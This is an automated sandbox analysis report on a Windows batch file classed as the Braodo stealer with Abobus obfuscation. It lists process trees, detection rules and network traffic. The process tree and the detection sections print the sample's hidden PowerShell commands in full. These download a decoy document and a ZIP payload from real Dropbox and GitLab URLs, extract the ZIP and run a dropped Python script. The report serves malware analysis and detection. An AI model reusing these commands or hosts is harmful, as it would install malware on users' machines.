Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hngadsfkgj17.bat

Overview

General Information

Sample name:hngadsfkgj17.bat
Analysis ID:1578271
MD5:6c35c77c00bba44f2d86d74cd3e6a3de
SHA1:82e5786895b0ddc0418699d2d980c818406d8063
SHA256:61e9db26c03e7850f014dff5430495ada8406aea46fc4fbe237b68d3abc8e59d
Tags:batBraodouser-JAMESWT_MHT
Infos:

Detection

Abobus Obfuscator, Braodo
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Abobus Obfuscator
Yara detected Braodo
Yara detected Powershell download and execute
AI detected suspicious sample
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 2324 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hngadsfkgj17.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chcp.com (PID: 5388 cmdline: chcp.com 437 MD5: 33395C4732A49065EA72590B14B64F32)
    • find.exe (PID: 6312 cmdline: find MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • findstr.exe (PID: 4932 cmdline: findstr /L /I set "C:\Users\user\Desktop\hngadsfkgj17.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 6872 cmdline: findstr /L /I goto "C:\Users\user\Desktop\hngadsfkgj17.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 4784 cmdline: findstr /L /I echo "C:\Users\user\Desktop\hngadsfkgj17.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 2812 cmdline: findstr /L /I pause "C:\Users\user\Desktop\hngadsfkgj17.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 1764 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • find.exe (PID: 4304 cmdline: find MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • cmd.exe (PID: 1404 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 5272 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 5064 cmdline: powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 5260 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 2012 cmdline: powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 2188 cmdline: powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\ld_312.pd clickapp" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
hngadsfkgj17.batJoeSecurity_AbobusObfuscatorYara detected Abobus ObfuscatorJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 5272JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 5260JoeSecurity_Braodo_1Yara detected BraodoJoe Security
        Process Memory Space: powershell.exe PID: 5260JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

          Other

          SourceRuleDescriptionAuthorStrings
          amsi64_5272.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            amsi64_5260.amsi.csvJoeSecurity_Braodo_1Yara detected BraodoJoe Security
              amsi64_5260.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi64_2188.amsi.csvJoeSecurity_Braodo_1Yara detected BraodoJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: PowerShell DownloadFile
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hngadsfkgj17.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2324, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", ProcessId: 5272, ProcessName: powershell.exe
                  Sigma detected: Suspicious Script Execution From Temp Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hngadsfkgj17.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2324, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", ProcessId: 5272, ProcessName: powershell.exe
                  Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
                  Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5260, TargetFilename: C:\Users\Public\Document.zip
                  Sigma detected: PowerShell Download Pattern
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hngadsfkgj17.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2324, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", ProcessId: 5272, ProcessName: powershell.exe
                  Sigma detected: PowerShell Web Download
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hngadsfkgj17.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2324, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", ProcessId: 5272, ProcessName: powershell.exe
                  Sigma detected: Usage Of Web Request Commands And Cmdlets
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hngadsfkgj17.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2324, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", ProcessId: 5272, ProcessName: powershell.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hngadsfkgj17.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2324, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')", ProcessId: 5272, ProcessName: powershell.exe

                  Suricata Signatures

                  No Suricata rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 91.0% probability
                  Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.6:49721 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.6:49738 version: TLS 1.2
                  Source: Binary string: jn.pdb source: powershell.exe, 0000000C.00000002.2307737559.000001FEF8A14000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ystem.pdb=H source: powershell.exe, 0000000E.00000002.2419838546.0000028FD5BF0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb` source: powershell.exe, 0000000C.00000002.2306528560.000001FEF87D0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 0000000C.00000002.2306528560.000001FEF87D0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.IO.Compression.FileSystem.pdb7-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000010.00000002.2543362832.0000029579060000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: n.pdb source: powershell.exe, 0000000E.00000002.2422979302.0000028FD5EC4000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: *e.pdb source: powershell.exe, 0000000E.00000002.2422979302.0000028FD5EC4000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 0000000C.00000002.2307737559.000001FEF8A14000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2422979302.0000028FD5EC4000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdbs source: powershell.exe, 0000000E.00000002.2419838546.0000028FD5BF0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb source: powershell.exe, 00000010.00000002.2543362832.000002957909B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: tem.pdb-z source: powershell.exe, 00000010.00000002.2544841727.0000029579571000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbG5 source: powershell.exe, 00000010.00000002.2544841727.00000295795C7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.2307737559.000001FEF8A14000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2419838546.0000028FD5CD7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ion.pdb source: powershell.exe, 00000010.00000002.2544841727.00000295795C7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: n.pdb6 source: powershell.exe, 0000000C.00000002.2307737559.000001FEF8A14000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: bpdbtem.pdbbH source: powershell.exe, 0000000E.00000002.2419838546.0000028FD5BF0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: 089\System.Core.pdb source: powershell.exe, 00000010.00000002.2543362832.0000029579060000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdbk source: powershell.exe, 00000010.00000002.2543362832.000002957909B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbg source: powershell.exe, 0000000C.00000002.2307737559.000001FEF8A14000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbF source: powershell.exe, 0000000E.00000002.2419838546.0000028FD5C99000.00000004.00000020.00020000.00000000.sdmp
                  Source: global trafficHTTP traffic detected: GET /scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1 HTTP/1.1Host: www.dropbox.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /garvdsf/dsfg/-/raw/main/FGa1712.zip HTTP/1.1Host: gitlab.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 172.65.251.78 172.65.251.78
                  Source: Joe Sandbox ViewIP Address: 162.125.69.18 162.125.69.18
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1 HTTP/1.1Host: www.dropbox.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /garvdsf/dsfg/-/raw/main/FGa1712.zip HTTP/1.1Host: gitlab.comConnection: Keep-Alive
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Policy: media-src https://* blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; img-src https://* data: blob: ; frame-ancestors 'self' https://*.dropbox.com ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; font-src https://* data: ; base-uri 'self' equals www.yahoo.com (Yahoo)
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: media-src https://* blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; img-src https://* data: blob: ; frame-ancestors 'self' https://*.dropbox.com ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; font-src https://* data: ; base-uri 'self' equals 